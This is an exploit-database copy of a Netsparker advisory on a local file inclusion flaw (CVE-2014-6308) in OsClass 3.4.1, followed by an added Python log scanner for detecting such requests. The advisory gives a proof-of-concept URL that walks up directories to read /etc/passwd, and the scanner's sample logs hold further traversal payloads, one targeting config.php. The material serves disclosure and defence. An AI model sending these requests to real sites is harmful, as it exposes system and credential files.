OsClass 3.4.1 (index.php, file param) - Local File Inclusion Vulnerability

2014-09-25T00:00:00
ID 1337DAY-ID-22689
Type zdt
Reporter Netsparker
Modified 2014-09-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
Information
-----------
Advisory by Netsparker.
Name : LFI Vulnerability in OsClass
Affected Software : OsClass
Affected Versions: 3.4.1 and possibly below
Vendor Homepage : http://osclass.org/
Vulnerability Type : Local File Inclusion
Severity : Critical
CVE-ID: CVE-2014-6308
Netsparker Advisory Reference : NS-14-031
 
Advisory URL
------------
https://www.netsparker.com/lfi-vulnerability-in-osclass/
 
Description
-----------
A local file inclusion vulnerability was discovered in Osclass, an
open source project that allows you to create a classifieds site.
 
Technical Details
-----------------
Proof of Concept URL for LFI in OsClass:
 
http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
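
A defender-side check for this request pattern, as an added example that is not part of the Netsparker advisory or the Osclass code base: it scans web access logs for requests to oc-admin/index.php with page=appearance and action=render whose file parameter, after repeated percent-decoding, contains a parent-directory segment, an absolute path or a NUL byte. The log lines, IP addresses, theme path and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Sep/2014:10:01:02 +0000] "GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../etc/passwd HTTP/1.1" 200 1532',
    '203.0.113.7 - - [25/Sep/2014:10:01:09 +0000] "GET /osclass/oc-admin/index.php?page=appearance&action=render&file=%252e%252e%252f%252e%252e%252fconfig.php HTTP/1.1" 200 410',
    '198.51.100.4 - - [25/Sep/2014:10:02:30 +0000] "GET /osclass/oc-admin/index.php?page=appearance&action=render&file=oc-content/themes/bender/admin/settings.php HTTP/1.1" 200 8120',
    '198.51.100.9 - - [25/Sep/2014:10:03:11 +0000] "GET /osclass/index.php?page=search&sPattern=..%2Fcar HTTP/1.1" 200 9921',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so encoded forms of the same value are not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(path):
    """True if the path can escape its base: '..' segment, absolute path or NUL byte."""
    normalized = path.replace("\\", "/")
    return (".." in normalized.split("/") or normalized.startswith("/")
            or "\x00" in normalized)

def find_lfi_attempts(lines):
    """Return (client_ip, decoded file value) for suspicious render requests."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/oc-admin/index.php"):
            continue  # only the admin endpoint named in the advisory
        params = parse_qs(url.query)  # parse_qs already decodes once
        if params.get("page") != ["appearance"] or params.get("action") != ["render"]:
            continue
        for raw in params.get("file", []):
            value = fully_decode(raw)
            if is_traversal(value):
                hits.append((ip, value))
    return hits
```

Hits on installations still running 3.4.1 or earlier should be followed up by checking the response size and status for the same request.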
 
Advisory Timeline
-----------------
03/09/2014 - First Contact
03/09/2014 - Vulnerability fixed:
https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
15/09/2014 - Fix released publicly in Osclass 3.4.2
 
Credits & Authors
-----------------
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner.
